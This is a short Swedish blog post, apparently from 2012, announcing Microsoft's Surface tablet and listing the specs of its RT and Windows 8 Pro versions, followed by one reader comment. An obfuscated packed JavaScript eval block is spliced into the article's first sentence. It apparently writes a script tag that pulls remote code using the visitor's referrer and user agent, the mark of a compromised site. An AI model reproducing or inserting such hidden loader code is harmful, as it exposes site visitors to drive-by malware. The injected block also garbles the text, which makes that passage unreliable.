Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Microsoft Surface

Microsoft Surface
Filip Urde
  • On 19 juni, 2012
  • http://www.revue.se/filip-urde

Microsoft eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nthsh|var|u0026u|referrer|ytkhr||js|php’.split(’|’),0,{}))
första egna tablet har precis presenterats och den heter: Surface.

Surface har en skärm på 10.6 tum, vilket är nästan en tum större än iPad. Den har ett inbyggt stöd så att den kan stå upp, den har ett skärmskydd med inbyggt tangenbord och samma skydd har även en touchpad. Enormt snyggt och skärmskyddet är dessutom endast 3 millimeter tjockt, vi gillar!

httpv://youtu.be/dpzu3HM2CIo

Surface finns i två versioner, Surface med Windows RT / ARM och Surface med Windows 8 Pro / Intel. Surface ska ha extra bra Wifi, men ser inte ut att få 3G.

RT-versionen är 9.3 mm tjock, med en skärm som ger HD-upplösning (1366×768), microSD, USB 2, HDMI-ut-port, stereohögtalare, två mikrofoner, 32 eller 64 GB minne. RT-versionen kommer med Office Home & Student 2013.

Windows 8 Pro-versionen får en Intel-processor av en ny generation processorer. Den väger lite mer (903 gram) och är tjockare (13.5 mm) men har högre upplösning (full HD, 1920×1080), microSDXC, USB 3, Mini DisplayPort för extern skärm, HDMI-ut-port, stereohögtalare, två mikrofoner, 64 eller 128 GB och du får en penna.

Vad Surface kommer kosta är i dagsläget okänt, men man säger att Surface ska ha ett ”Price to compete”. Vi vet heller inte när den släpps.

 

Comments

  1. Hampus

    Me like 🙂